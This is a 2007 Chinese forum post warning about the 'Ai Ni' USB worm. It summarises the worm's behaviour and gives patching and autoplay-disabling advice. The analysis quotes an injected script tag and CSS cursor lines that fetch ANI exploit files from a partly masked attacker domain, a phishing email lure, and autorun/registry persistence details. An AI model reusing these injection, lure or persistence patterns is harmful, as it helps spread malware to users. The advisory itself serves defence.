找回密码
 注册

ɨһɨ΢

QQ¼

ֻһٿʼ

搜索
安徽家装论坛管理细则
查看: 1381|回复: 0

蠕虫“艾妮”最新U盘病毒大家小心

[复制链接]
发表于 2007-4-21 13:38:57 | 显示全部楼层 |阅读模式
[h1]最近发现本公司几个U盘都中了“艾妮”蠕虫病毒所以请大家在使用U盘的时候一定要注[/h1]
“艾妮”复合型病毒。该病毒通过微软Windows系统ANI(动态光标)文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播,病毒自我传播能力很强。并且感染该病毒后,会自动下载运行木马程序,造成较大危害。

  该蠕虫先后出现很多变种,在出现后的短时期内迅速传播,遭受感染的用户难于彻底清除,给其工作带来诸多不便。
蠕虫情况分析如下:

  病毒名称:Worm_MyInfect.af
  中 文 名:“艾妮”
  其他名称:I-Worm/AniLoad(江民)
        Worm.MyInfect (金山)
        Worm.DlOnlineGames (瑞星)
  病毒类型:复合型
  感染系统:Windows 9X/ Windows ME/ Windows NT/ Windows 2000/
        Windows XP/ Windows 2003/ Windows Vista

  病毒特性:

    1、生成病毒文件

    病毒运行后,复制自身到下面目录:%SysDir%\\sysload3.exe


    2、 修改注册表项

    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    \"System Boot Check\"=\"%SysDir%\\sysload3.exe\"这样,病毒就可以        随Windows系统启动自动运行。


    3、感染系统中文件

    它能感染本地磁盘和网络共享目录中的可执行文件和脚本文件。
    1) 感染可执行文件
    将被感染文件和病毒融合成一个文件(被感染文件贴在病毒文件尾部)完成感
    染。
    2) 脚本类文件
    在这些脚本文件尾加上如下注示 <script src=http:// ****.microfsot.     com/Noindex.js></script>
    下载该脚本文件,里面含有如下代码:
    <DIV style=\"CURSOR: url(&#39;http://****.microfsot.com/*.jpg&#39;)\">
    <DIV style=\"CURSOR: url(&#39;http://****.microfsot.com/*.jpg&#39;)\">
    以上两个图片链接利用了ANI漏洞,图片文件中含有溢出攻击代码,因此打
    开上面的Noindex.js网页时便会中毒。

    4、下载指定网址文件

    从指定网址下载木马程序和病毒升级程序。

    5、通过电子邮件传播

    病毒邮件特征如下:
    发件人: i_love_cq@sohu.com
    主题:你和谁视频的时候被拍下的?给你笑死了!
    正文:
    看你那小样!我看你是出名了!
    你看这个地址!你的脸拍的那么清楚!你变明星了!
    http://****.microfsot.com/***/134952.htm
    如果用户点击了以上带有病毒的网页,就会遭受感染。

    6、其它
    遍历a-z的所有驱动器,如果该驱动器为“可移动存储”就在该驱动器上创
    建AUTORUN.INF,来达到传播自己的目的。检测软驱,若存在则复制病毒文
    件到其中文件名为tool.exe,并生成autorun.inf文件,使病毒可以自动运
    行,以传播自身。
    修改hosts文件,屏蔽多个网址。这些网址大多是以前用来传播其他病毒的
    站点。
   


  解决方法:

    1、对没有遭受感染的计算机用户,应该尽快安装微软公司最新操作系统补
    丁(KB925902),并及时升级系统中的防病毒软件,同时打开防病毒软件的
    “实时监控”功能。

    2、对已经感染变种的计算机用户,建议尽快下载专杀工具进行查杀修复工
    作。并安装微软公司最新操作系统补丁(KB925902)。

     专杀工具下载链接地址:

http://download.jiangmin.info/jmsoft/ANIWormKiller.exe (江民公司)

    微软公司相关补丁下载地址:

http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

  安全建议:

    1、局域网的计算机用户尽量避免创建可写的共享目录,已经创建共享目录
   的应立即停止共享。

    2、如无必要,Windows 2000/XP用户应尽量关闭IPC$共享,并给具有管理员    权限的帐号设置复杂的密码。

    3、及时安装微软的安全更新,不要随意访问来源不明的网站。

    4、计算机系统安装防病毒软件,并及时升级病毒定义库。

    5、计算机用户使用U盘等移动设备交换文件时,务必开启杀毒软件的“实时
   监控”功能,或先用防病毒软件扫描,并关闭自动播放功能。

    6、用户应慎用操作系统默认提供的“自动播放”功能,防止在使用移动存
   储介质过程中受到感染。用户可以在超级用户权限下按如下方法关闭该功能:

    Windows XP用户:
    “开始”->“运行”->输入“gpedit.msc”确定后打开“组策略”;
    依次打开:“计算机配置”->“管理模板”->单击“系统”项;
    在右边设置中有一项“关闭自动播放”,双击打开其属性;
    选择“己启用”在属性框中选中所有驱动器,点击“确定”;
    同理再打开: “用户配制”->“管理模板”->单击“系统”项;
    在右边设置中有一项“关闭自动播放”,双击打开属性;
    选择“己启用”在属性框中选中所有驱动器,点击“确定”;
    即可关闭自动播放。

    注:Windows 2000用户打开“组策略”方法是,“开始”->“运行”->
    输入“mmc”->单击确定,打开控制台,选择“控制台”菜单中“添加/删
    除管理单元”,单击“添加”,选择“组策略”->添加
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表